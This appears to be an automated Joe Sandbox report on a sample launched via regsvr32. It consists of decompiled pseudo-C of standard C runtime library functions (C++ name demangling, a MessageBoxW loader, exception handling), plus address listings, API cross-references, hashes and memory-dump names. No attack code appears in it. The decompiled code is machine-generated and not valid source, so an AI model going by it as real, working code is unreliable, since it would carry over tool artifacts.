				goto 0x2b06ea9b;
				if ( *_t181 != 0) goto 0x2b06ea57;
				E00007FFD7FFD2B06A640(1, _t122, _t181);
				goto 0x2b06ea9b;
				_t41 = _t186 + 0x10; // -303
				E00007FFD7FFD2B06A490(1, _t122, _t41);
				_t42 = _t189 + 0x20; // -95
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x20], xmm0");
				E00007FFD7FFD2B06AFE0(_t84, _t98, _t122, _t126, _t42, "::", _t183, _t191);
				asm("movaps xmm5, [esp+0x20]");
				_t43 = _t189 + 0x20; // -95
				asm("movdqa [esp+0x20], xmm5");
				_t79 = E00007FFD7FFD2B06AC78(_t122, _t43, _t181);
				asm("movaps xmm5, [esp+0x20]");
				asm("movdqu [edi], xmm5");
				return _t79;
			}

0x7ffd2b06e6cc
0x7ffd2b06e6cc
0x7ffd2b06e6cc
0x7ffd2b06e6cc
0x7ffd2b06e6cc
0x7ffd2b06e6cc
0x7ffd2b06e6cf
0x7ffd2b06e6d3
0x7ffd2b06e6d7
0x7ffd2b06e6dc
0x7ffd2b06e6dc
0x7ffd2b06e6e3
0x7ffd2b06e6ea
0x7ffd2b06e6ee
0x7ffd2b06e6f2
0x7ffd2b06e6f9
0x7ffd2b06e6fc
0x7ffd2b06e703
0x7ffd2b06e709
0x7ffd2b06e713
0x7ffd2b06e71c
0x7ffd2b06e729
0x7ffd2b06e732
0x7ffd2b06e73c
0x7ffd2b06e745
0x7ffd2b06e74c
0x7ffd2b06e751
0x7ffd2b06e758
0x7ffd2b06e75b
0x7ffd2b06e760
0x7ffd2b06e765
0x7ffd2b06e769
0x7ffd2b06e770
0x7ffd2b06e772
0x7ffd2b06e77b
0x7ffd2b06e780
0x7ffd2b06e788
0x7ffd2b06e78b
0x7ffd2b06e791
0x7ffd2b06e796
0x7ffd2b06e79b
0x7ffd2b06e79e
0x7ffd2b06e7a2
0x7ffd2b06e7a9
0x7ffd2b06e7ac
0x7ffd2b06e7b2
0x7ffd2b06e7b5
0x7ffd2b06e7c2
0x7ffd2b06e7ca
0x7ffd2b06e7d3
0x7ffd2b06e7d9
0x7ffd2b06e7dc
0x7ffd2b06e7e5
0x7ffd2b06e7e7
0x7ffd2b06e7ed
0x7ffd2b06e7f2
0x7ffd2b06e7fb
0x7ffd2b06e7fe
0x7ffd2b06e803
0x7ffd2b06e80a
0x7ffd2b06e80f
0x7ffd2b06e816
0x7ffd2b06e81b
0x7ffd2b06e822
0x7ffd2b06e826
0x7ffd2b06e82c
0x7ffd2b06e831
0x7ffd2b06e838
0x7ffd2b06e83d
0x7ffd2b06e842
0x7ffd2b06e847
0x7ffd2b06e84b
0x7ffd2b06e850
0x7ffd2b06e857
0x7ffd2b06e85b
0x7ffd2b06e860
0x7ffd2b06e865
0x7ffd2b06e86b
0x7ffd2b06e86e
0x7ffd2b06e873
0x7ffd2b06e878
0x7ffd2b06e87c
0x7ffd2b06e883
0x7ffd2b06e888
0x7ffd2b06e88d
0x7ffd2b06e890
0x7ffd2b06e894
0x7ffd2b06e899
0x7ffd2b06e8a0
0x7ffd2b06e8a0
0x7ffd2b06e8a7
0x7ffd2b06e8ad
0x7ffd2b06e8af
0x7ffd2b06e8b6
0x7ffd2b06e8ba
0x7ffd2b06e8bf
0x7ffd2b06e8c4
0x7ffd2b06e8cb
0x7ffd2b06e8ce
0x7ffd2b06e8d3
0x7ffd2b06e8d8
0x7ffd2b06e8dc
0x7ffd2b06e8e0
0x7ffd2b06e8ea
0x7ffd2b06e8f0
0x7ffd2b06e8f7
0x7ffd2b06e8fc
0x7ffd2b06e900
0x7ffd2b06e905
0x7ffd2b06e90b
0x7ffd2b06e90e
0x7ffd2b06e913
0x7ffd2b06e91b
0x7ffd2b06e91e
0x7ffd2b06e924
0x7ffd2b06e929
0x7ffd2b06e92e
0x7ffd2b06e935
0x7ffd2b06e93b
0x7ffd2b06e940
0x7ffd2b06e944
0x7ffd2b06e94c
0x7ffd2b06e951
0x7ffd2b06e956
0x7ffd2b06e95a
0x7ffd2b06e96a
0x7ffd2b06e96d
0x7ffd2b06e979
0x7ffd2b06e97d
0x7ffd2b06e982
0x7ffd2b06e989
0x7ffd2b06e98c
0x7ffd2b06e991
0x7ffd2b06e996
0x7ffd2b06e99a
0x7ffd2b06e99e
0x7ffd2b06e9a8
0x7ffd2b06e9ae
0x7ffd2b06e9b3
0x7ffd2b06e9b5
0x7ffd2b06e9bc
0x7ffd2b06e9c3
0x7ffd2b06e9c8
0x7ffd2b06e9cd
0x7ffd2b06e9d5
0x7ffd2b06e9d8
0x7ffd2b06e9de
0x7ffd2b06e9e3
0x7ffd2b06e9e8
0x7ffd2b06e9ea
0x7ffd2b06e9ee
0x7ffd2b06e9f3
0x7ffd2b06e9f8
0x7ffd2b06ea00
0x7ffd2b06ea03
0x7ffd2b06ea09
0x7ffd2b06ea0e
0x7ffd2b06ea13
0x7ffd2b06ea1b
0x7ffd2b06ea20
0x7ffd2b06ea2a
0x7ffd2b06ea2f
0x7ffd2b06ea31
0x7ffd2b06ea38
0x7ffd2b06ea3c
0x7ffd2b06ea40
0x7ffd2b06ea4b
0x7ffd2b06ea50
0x7ffd2b06ea55
0x7ffd2b06ea57
0x7ffd2b06ea5b
0x7ffd2b06ea67
0x7ffd2b06ea6c
0x7ffd2b06ea6f
0x7ffd2b06ea75
0x7ffd2b06ea7a
0x7ffd2b06ea7f
0x7ffd2b06ea87
0x7ffd2b06ea8d
0x7ffd2b06ea92
0x7ffd2b06ea97
0x7ffd2b06eab6

APIs

DName::DName.LIBCMT ref: 00007FFD2B06E74C
DName::operator+=.LIBCMT ref: 00007FFD2B06E760
DName::DName.LIBCMT ref: 00007FFD2B06E77B
DName::operator+=.LIBCMT ref: 00007FFD2B06E791
DName::DName.LIBCMT ref: 00007FFD2B06E7FE
DName::operator+=.LIBCMT ref: 00007FFD2B06E816
DName::operator+=.LIBCMT ref: 00007FFD2B06E82C
DName::operator+=.LIBCMT ref: 00007FFD2B06E842
UnDecorator::getZName.LIBCMT ref: 00007FFD2B06E860
DName::operator+=.LIBCMT ref: 00007FFD2B06E873
DName::operator+=.LIBCMT ref: 00007FFD2B06E888
DName::operator+=.LIBCMT ref: 00007FFD2B06E8D3
DName::DName.LIBCMT ref: 00007FFD2B06E90E
DName::operator+=.LIBCMT ref: 00007FFD2B06E924
DName::operator+=.LIBCMT ref: 00007FFD2B06E93B
DName::operator+=.LIBCMT ref: 00007FFD2B06E951
DName::DName.LIBCMT ref: 00007FFD2B06E97D
DName::operator+=.LIBCMT ref: 00007FFD2B06E991

Part of subcall function 00007FFD2B06C7D0: DName::operator=.LIBCMT ref: 00007FFD2B06C865
Part of subcall function 00007FFD2B06C7D0: DName::DName.LIBCMT ref: 00007FFD2B06C880
Part of subcall function 00007FFD2B06C7D0: DName::operator+=.LIBCMT ref: 00007FFD2B06C895

DName::operator=.LIBCMT ref: 00007FFD2B06EA50
DName::operator+=.LIBCMT ref: 00007FFD2B06EA75
DName::operator+=.LIBCMT ref: 00007FFD2B06EA8D

Strings

`anonymous namespace', xrefs: 00007FFD2B06E972

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Name::$Name::operator=$Decorator::get
String ID: `anonymous namespace'
API String ID: 1781730666-3062148218
Opcode ID: 3b962ae5eba93f022486d85bf94d9a668456d366c323bf6f1aa605f1a91461a7
Instruction ID: 6987f4d8274e8e9de669c3d2847d13d24dace2d9776e0c8026815ce368febbc5
Opcode Fuzzy Hash: 3b962ae5eba93f022486d85bf94d9a668456d366c323bf6f1aa605f1a91461a7
Instruction Fuzzy Hash: 79C1C962F0978688F7129B25CE622FC6360FF5A748F449131DB8D166B6DF6CE185D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B9F8 Relevance: 39.2, APIs: 26, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E00007FFD7FFD2B06B9F8(void* __esi, long long __rbx, void* __rcx, intOrPtr* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r10, void* __r11, long long __r12, long long _a8, long long _a16, long long _a24) {
				void* _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				signed int _v112;
				char _v120;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t161;
				void* _t170;
				intOrPtr* _t181;
				long long _t183;

				_t176 = __r8;
				_t168 = __rdi;
				_t153 = __rdx;
				_t124 = __rbx;
				_t104 = __esi;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __r12;
				_t121 =  *0x2b0c9a70; // 0x0
				r14d = 0;
				_t181 = __rdx;
				_t170 = __rcx;
				if ( *_t121 == r14b) goto 0x2b06bbc3;
				r13d = E00007FFD7FFD2B069780();
				r13d =  <  ? r14d : r13d;
				if (r13d != 0) goto 0x2b06baa3;
				E00007FFD7FFD2B06A9A8(0x5b, _t121,  &_v72);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x60], xmm0");
				if (_v112 - 1 > 0) goto 0x2b06ba86;
				if (_v120 == _t183) goto 0x2b06ba78;
				_t7 = _t183 + 1; // 0x1
				E00007FFD7FFD2B06A12C(_t7, _t153);
				E00007FFD7FFD2B06A564(_t121, __rbx,  &_v120, _t121, __r8);
				goto 0x2b06ba86;
				E00007FFD7FFD2B06A640(1, _t121,  &_v120);
				asm("movaps xmm0, [ebp-0x60]");
				asm("movdqa [ebp-0x50], xmm0");
				E00007FFD7FFD2B06AF5C(0x5d, __esi, _t121, _t124,  &_v104, _t170, __r8);
				goto 0x2b06bcb2;
				_v112 = _v112 & 0xffff0000;
				_v120 = _t183;
				if (( *(_t181 + 8) & 0x00000800) == 0) goto 0x2b06bb2f;
				E00007FFD7FFD2B06AFE0(_t7, __esi, _t121, _t124,  &_v120, "[]", _t170, __r8);
				goto 0x2b06bb2f;
				r13d = r13d - 1;
				if (r13d == 0) goto 0x2b06bb35;
				_t122 =  *0x2b0c9a70; // 0x0
				if ( *_t122 == r14b) goto 0x2b06bb35;
				E00007FFD7FFD2B06B32C(0, _t122, _t124,  &_v56, __rdi, _t170, __r10, __r11);
				_t125 = _t122;
				E00007FFD7FFD2B06A9A8(0x5b, _t122,  &_v40);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x40], xmm0");
				E00007FFD7FFD2B06AC78(_t122,  &_v88, _t122);
				asm("movaps xmm5, [ebp-0x40]");
				asm("movdqa [ebp-0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x5d, _t104, _t122, _t122,  &_v72, _t170, _t176);
				E00007FFD7FFD2B06AC78(_t122,  &_v120,  &_v72);
				if (_v112 - 1 <= 0) goto 0x2b06bacb;
				if ( *_t181 == _t183) goto 0x2b06bba4;
				if (( *(_t181 + 8) & 0x00000800) == 0) goto 0x2b06bb52;
				asm("inc ecx");
				asm("movdqu [ebp-0x30], xmm0");
				goto 0x2b06bb8e;
				E00007FFD7FFD2B06A9A8(0x28, _t122,  &_v40);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t122,  &_v72, _t181);
				asm("movaps xmm5, [ebp-0x30]");
				asm("movdqa [ebp-0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x29, _t104, _t122, _t122,  &_v72, _t170, _t176);
				asm("movaps xmm5, [ebp-0x30]");
				asm("movdqa [ebp-0x30], xmm5");
				E00007FFD7FFD2B06AC78(_t122,  &_v72,  &_v120);
				asm("movaps xmm5, [ebp-0x30]");
				asm("movdqa [ebp-0x60], xmm5");
				_t161 =  &_v120;
				E00007FFD7FFD2B07006C(_t86, _t7, 0x29, _t104, _t122, _t122,  &_v104, _t161, _t168, _t170, _t176, __r10, __r11, _t181);
				asm("bts dword [ebp-0x48], 0xb");
				asm("movups xmm0, [ebp-0x50]");
				asm("movdqu [esi], xmm0");
				goto 0x2b06bcba;
				if ( *_t161 == _t183) goto 0x2b06bc59;
				E00007FFD7FFD2B06A9A8(0x28, _t122,  &_v40);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t122,  &_v72, _t181);
				asm("movaps xmm5, [ebp-0x30]");
				asm("movdqa [ebp-0x60], xmm5");
				E00007FFD7FFD2B06AFE0(_t7, _t104, _t122, _t122,  &_v120, ")[", _t170, _t176);
				asm("movaps xmm5, [ebp-0x60]");
				asm("movdqa [ebp-0x50], xmm5");
				if (_v112 - 1 > 0) goto 0x2b06bc3f;
				if (_v120 == _t183) goto 0x2b06bc31;
				E00007FFD7FFD2B06A12C(1, ")[");
				E00007FFD7FFD2B06A564(_t122, _t125,  &_v104, _t122, _t176);
				goto 0x2b06bc3f;
				E00007FFD7FFD2B06A640(1, _t122,  &_v104);
				asm("movaps xmm0, [ebp-0x50]");
				asm("movdqa [ebp-0x40], xmm0");
				E00007FFD7FFD2B06AF5C(0x5d, _t104, _t122, _t125,  &_v88, _t170, _t176);
				goto 0x2b06bcb2;
				E00007FFD7FFD2B06A9A8(0x5b, _t122,  &_v88);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x60], xmm0");
				if (_v112 - 1 > 0) goto 0x2b06bc9a;
				if (_v120 == _t183) goto 0x2b06bc8c;
				E00007FFD7FFD2B06A12C(1,  &_v88);
				E00007FFD7FFD2B06A564(_t122, _t125,  &_v120, _t122, _t176);
				goto 0x2b06bc9a;
				E00007FFD7FFD2B06A640(1, _t122,  &_v120);
				asm("movaps xmm0, [ebp-0x60]");
				asm("movdqa [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AF5C(0x5d, _t104, _t122, _t125,  &_v72, _t170, _t176);
				return E00007FFD7FFD2B06FC30(_t86, 1, _t104, _t122, _t125, _t170,  &_v72, _t176, __r10, __r11);
			}

0x7ffd2b06b9f8
0x7ffd2b06b9f8
0x7ffd2b06b9f8
0x7ffd2b06b9f8
0x7ffd2b06b9f8
0x7ffd2b06b9f8
0x7ffd2b06b9fd
0x7ffd2b06ba02
0x7ffd2b06ba16
0x7ffd2b06ba1d
0x7ffd2b06ba20
0x7ffd2b06ba23
0x7ffd2b06ba29
0x7ffd2b06ba36
0x7ffd2b06ba39
0x7ffd2b06ba40
0x7ffd2b06ba48
0x7ffd2b06ba4d
0x7ffd2b06ba50
0x7ffd2b06ba59
0x7ffd2b06ba5f
0x7ffd2b06ba61
0x7ffd2b06ba65
0x7ffd2b06ba71
0x7ffd2b06ba76
0x7ffd2b06ba81
0x7ffd2b06ba86
0x7ffd2b06ba90
0x7ffd2b06ba95
0x7ffd2b06ba9e
0x7ffd2b06baa3
0x7ffd2b06bab3
0x7ffd2b06bab7
0x7ffd2b06bac4
0x7ffd2b06bac9
0x7ffd2b06bace
0x7ffd2b06bad3
0x7ffd2b06bad5
0x7ffd2b06badf
0x7ffd2b06bae7
0x7ffd2b06baf2
0x7ffd2b06baf5
0x7ffd2b06bb01
0x7ffd2b06bb04
0x7ffd2b06bb09
0x7ffd2b06bb0e
0x7ffd2b06bb18
0x7ffd2b06bb1d
0x7ffd2b06bb2a
0x7ffd2b06bb33
0x7ffd2b06bb39
0x7ffd2b06bb44
0x7ffd2b06bb46
0x7ffd2b06bb4b
0x7ffd2b06bb50
0x7ffd2b06bb58
0x7ffd2b06bb64
0x7ffd2b06bb67
0x7ffd2b06bb6c
0x7ffd2b06bb71
0x7ffd2b06bb7b
0x7ffd2b06bb80
0x7ffd2b06bb85
0x7ffd2b06bb89
0x7ffd2b06bb96
0x7ffd2b06bb9b
0x7ffd2b06bb9f
0x7ffd2b06bba4
0x7ffd2b06bbac
0x7ffd2b06bbb1
0x7ffd2b06bbb6
0x7ffd2b06bbba
0x7ffd2b06bbbe
0x7ffd2b06bbca
0x7ffd2b06bbd2
0x7ffd2b06bbde
0x7ffd2b06bbe1
0x7ffd2b06bbe6
0x7ffd2b06bbeb
0x7ffd2b06bbfa
0x7ffd2b06bbff
0x7ffd2b06bc08
0x7ffd2b06bc0c
0x7ffd2b06bc11
0x7ffd2b06bc17
0x7ffd2b06bc1e
0x7ffd2b06bc2a
0x7ffd2b06bc2f
0x7ffd2b06bc3a
0x7ffd2b06bc3f
0x7ffd2b06bc49
0x7ffd2b06bc4e
0x7ffd2b06bc57
0x7ffd2b06bc5b
0x7ffd2b06bc60
0x7ffd2b06bc63
0x7ffd2b06bc6c
0x7ffd2b06bc72
0x7ffd2b06bc79
0x7ffd2b06bc85
0x7ffd2b06bc8a
0x7ffd2b06bc95
0x7ffd2b06bc9a
0x7ffd2b06bca4
0x7ffd2b06bca9
0x7ffd2b06bcd9

APIs

DNameStatusNode::make.LIBCMT ref: 00007FFD2B06BA65
DName::append.LIBCMT ref: 00007FFD2B06BA71
DName::operator=.LIBCMT ref: 00007FFD2B06BA81
DName::operator+=.LIBCMT ref: 00007FFD2B06BA95
DName::DName.LIBCMT ref: 00007FFD2B06BAF5
DName::operator+=.LIBCMT ref: 00007FFD2B06BB09
DName::operator+=.LIBCMT ref: 00007FFD2B06BB1D
DName::operator+=.LIBCMT ref: 00007FFD2B06BB2A
DName::DName.LIBCMT ref: 00007FFD2B06BB58
DName::operator+=.LIBCMT ref: 00007FFD2B06BB6C
DName::operator+=.LIBCMT ref: 00007FFD2B06BB80
DName::operator=.LIBCMT ref: 00007FFD2B06BC3A
DName::DName.LIBCMT ref: 00007FFD2B06BA48

Part of subcall function 00007FFD2B06A9A8: DName::doPchar.LIBCMT ref: 00007FFD2B06A9D2

DName::operator+=.LIBCMT ref: 00007FFD2B06BAC4
DName::operator+=.LIBCMT ref: 00007FFD2B06BB96
DName::DName.LIBCMT ref: 00007FFD2B06BBD2
DName::operator+=.LIBCMT ref: 00007FFD2B06BBE6
DName::operator+=.LIBCMT ref: 00007FFD2B06BBFF
DNameStatusNode::make.LIBCMT ref: 00007FFD2B06BC1E
DName::append.LIBCMT ref: 00007FFD2B06BC2A
DName::operator+=.LIBCMT ref: 00007FFD2B06BC4E
DName::DName.LIBCMT ref: 00007FFD2B06BC5B
DNameStatusNode::make.LIBCMT ref: 00007FFD2B06BC79
DName::append.LIBCMT ref: 00007FFD2B06BC85
DName::operator=.LIBCMT ref: 00007FFD2B06BC95

Part of subcall function 00007FFD2B06A640: DNameStatusNode::make.LIBCMT ref: 00007FFD2B06A65C

DName::operator+=.LIBCMT ref: 00007FFD2B06BCA9

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Name::$Node::makeStatus$Name::appendName::operator=$Name::doPchar
String ID:
API String ID: 4027959325-0
Opcode ID: 713901862d3d8992a6796a57517459ac42e57481271e151f600c96f1cf72c620
Instruction ID: 638c337443d483cece284568066d1735f542420afb7facded25ce9c01ed4cec7
Opcode Fuzzy Hash: 713901862d3d8992a6796a57517459ac42e57481271e151f600c96f1cf72c620
Instruction Fuzzy Hash: 18919462F05B668CF702DBB49D631FC2371BB56348F405131DE4D266AAEFB8A585D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B072ED4 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFD2B072F19
GetProcAddress.KERNEL32 ref: 00007FFD2B072F35
EncodePointer.KERNEL32 ref: 00007FFD2B072F47
GetProcAddress.KERNEL32 ref: 00007FFD2B072F5E
EncodePointer.KERNEL32 ref: 00007FFD2B072F67
GetProcAddress.KERNEL32 ref: 00007FFD2B072F7E
EncodePointer.KERNEL32 ref: 00007FFD2B072F87
GetProcAddress.KERNEL32 ref: 00007FFD2B072F9E
EncodePointer.KERNEL32 ref: 00007FFD2B072FA7
GetProcAddress.KERNEL32 ref: 00007FFD2B072FC6
EncodePointer.KERNEL32 ref: 00007FFD2B072FCF
DecodePointer.KERNEL32 ref: 00007FFD2B073002
DecodePointer.KERNEL32 ref: 00007FFD2B073012
DecodePointer.KERNEL32 ref: 00007FFD2B073068
DecodePointer.KERNEL32 ref: 00007FFD2B073089
DecodePointer.KERNEL32 ref: 00007FFD2B0730A3

Strings

GetUserObjectInformationW, xrefs: 00007FFD2B072F8D
GetLastActivePopup, xrefs: 00007FFD2B072F6D
USER32.DLL, xrefs: 00007FFD2B072F12
GetProcessWindowStation, xrefs: 00007FFD2B072FBC
MessageBoxW, xrefs: 00007FFD2B072F2B
GetActiveWindow, xrefs: 00007FFD2B072F4D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 714c0453ead0fe40a95261437f20b96b67bbcf58881a4c782b26f4c38195a670
Instruction ID: 263622ee125bf1dd998a80bd4df372316e853680762522d4d8d7173118e470bd
Opcode Fuzzy Hash: 714c0453ead0fe40a95261437f20b96b67bbcf58881a4c782b26f4c38195a670
Instruction Fuzzy Hash: 8B51F724F0BA4280FE57DB51AE3467463A0AF5BB80B544135DE4E033B0EFBCE545A2D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B080130 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E00007FFD7FFD2B080130(void* __ebx, void* __ecx, void* __edi, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, signed int* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t138;
				void* _t152;
				intOrPtr _t154;
				intOrPtr _t156;
				void* _t164;
				void* _t165;
				signed int _t167;
				void* _t212;
				void* _t213;
				signed long long _t217;
				long long _t218;
				signed int* _t221;
				signed int _t223;
				intOrPtr _t225;
				signed int* _t226;
				void* _t273;
				intOrPtr* _t274;
				intOrPtr* _t275;
				void* _t277;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t303;
				intOrPtr* _t306;
				intOrPtr* _t308;
				void* _t311;
				long long _t312;
				void* _t314;
				void* _t319;
				void* _t321;
				signed int* _t322;

				_t163 = __edi;
				_t152 = __ecx;
				_t212 = _t284;
				 *((long long*)(_t212 + 0x20)) = __rbx;
				 *((long long*)(_t212 + 0x18)) = __r8;
				 *((long long*)(_t212 + 0x10)) = __rdx;
				_t282 = _t212 - 0x3f;
				_t285 = _t284 - 0x90;
				_t225 =  *((intOrPtr*)(_t282 + 0x67));
				_t312 = __rdx;
				_t274 = __rcx;
				r14b = 0;
				_t322 = __r9;
				 *((intOrPtr*)(_t282 + 0x47)) = r14b;
				_t164 = E00007FFD7FFD2B07ECF0(_t225, __r9);
				E00007FFD7FFD2B07E3C8(__edi, _t212, _t225, __rdx, _t322, _t277, _t282, _t225, _t282 - 0x21, _t321, _t319);
				if (_t164 - E00007FFD7FFD2B07ED68(_t212, __rdx, _t225) <= 0) goto 0x2b0801c2;
				r9d = _t164;
				E00007FFD7FFD2B07ED20(_t106, _t282 - 0x21, _t225);
				r9d = _t164;
				_t291 = _t225;
				E00007FFD7FFD2B07ED2C(_t212, _t225, _t312, _t225, _t311);
				goto 0x2b0801cc;
				_t165 = E00007FFD7FFD2B07ED68(_t212, _t312, _t225);
				if (_t165 - 0xffffffff < 0) goto 0x2b0801d6;
				if (_t165 -  *((intOrPtr*)(_t225 + 4)) < 0) goto 0x2b0801db;
				E00007FFD7FFD2B072484(_t212);
				if ( *_t274 != 0xe06d7363) goto 0x2b0805bf;
				if ( *((intOrPtr*)(_t274 + 0x18)) != 4) goto 0x2b080382;
				if ( *((intOrPtr*)(_t274 + 0x20)) == 0x19930520) goto 0x2b080210;
				if ( *((intOrPtr*)(_t274 + 0x20)) == 0x19930521) goto 0x2b080210;
				if ( *((intOrPtr*)(_t274 + 0x20)) != 0x19930522) goto 0x2b080382;
				if ( *((long long*)(_t274 + 0x30)) != 0) goto 0x2b080382;
				E00007FFD7FFD2B067F5C(_t152,  *((long long*)(_t274 + 0x30)), _t212, _t312, _t277, _t225);
				if ( *((long long*)(_t212 + 0xf0)) == 0) goto 0x2b0805a4;
				E00007FFD7FFD2B067F5C(_t152,  *((long long*)(_t212 + 0xf0)), _t212, _t312, _t277, _t225);
				_t275 =  *((intOrPtr*)(_t212 + 0xf0));
				E00007FFD7FFD2B067F5C(_t152,  *((long long*)(_t212 + 0xf0)), _t212, _t312, _t277, _t225);
				 *((long long*)(_t282 + 0x57)) =  *((intOrPtr*)(_t212 + 0xf8));
				if (E00007FFD7FFD2B0808A8(E00007FFD7FFD2B07E500(_t212,  *((intOrPtr*)(_t275 + 0x38))), _t275) != 0) goto 0x2b080269;
				E00007FFD7FFD2B072484(_t212);
				if ( *_t275 != 0xe06d7363) goto 0x2b08029e;
				if ( *((intOrPtr*)(_t275 + 0x18)) != 4) goto 0x2b08029e;
				if ( *((intOrPtr*)(_t275 + 0x20)) == 0x19930520) goto 0x2b080292;
				if ( *((intOrPtr*)(_t275 + 0x20)) == 0x19930521) goto 0x2b080292;
				if ( *((intOrPtr*)(_t275 + 0x20)) != 0x19930522) goto 0x2b08029e;
				if ( *((long long*)(_t275 + 0x30)) != 0) goto 0x2b08029e;
				E00007FFD7FFD2B072484(_t212);
				E00007FFD7FFD2B067F5C(_t152,  *((long long*)(_t275 + 0x30)), _t212, _t275, _t277, _t225);
				if ( *(_t212 + 0x108) == 0) goto 0x2b080382;
				E00007FFD7FFD2B067F5C(_t152,  *(_t212 + 0x108), _t212, _t275, _t277, _t225);
				_t306 =  *(_t212 + 0x108);
				E00007FFD7FFD2B067F5C(_t152,  *(_t212 + 0x108), _t212, _t275, _t277, _t291);
				 *(_t212 + 0x108) =  *(_t212 + 0x108) & 0x00000000;
				if (E00007FFD7FFD2B07F534(_t152, _t212, _t225, _t275, _t306, _t277, _t282) != 0) goto 0x2b08037e;
				r13d = 0;
				if ( *_t306 - r13d <= 0) goto 0x2b08033a;
				E00007FFD7FFD2B07E4B4(_t212);
				_t213 = _t212 + _t277;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t306 + 4)) + _t213 + 4)) == 0) goto 0x2b080318;
				E00007FFD7FFD2B07E4B4(_t213);
				_t226 =  *((intOrPtr*)( *((intOrPtr*)(_t306 + 4)) + _t213 + _t277 + 4));
				E00007FFD7FFD2B07E4B4(_t213 + _t277);
				goto 0x2b08031a;
				if (E00007FFD7FFD2B064AE4(_t213 + _t277 + _t226, 0x2b0c8a48) != 0) goto 0x2b080340;
				r13d = r13d + 1;
				if (r13d -  *_t306 < 0) goto 0x2b0802e8;
				E00007FFD7FFD2B072440(r13d -  *_t306, _t213 + _t277 + _t226, _t213 + _t277 + _t226);
				asm("int3");
				E00007FFD7FFD2B07F1C0(1, _t275);
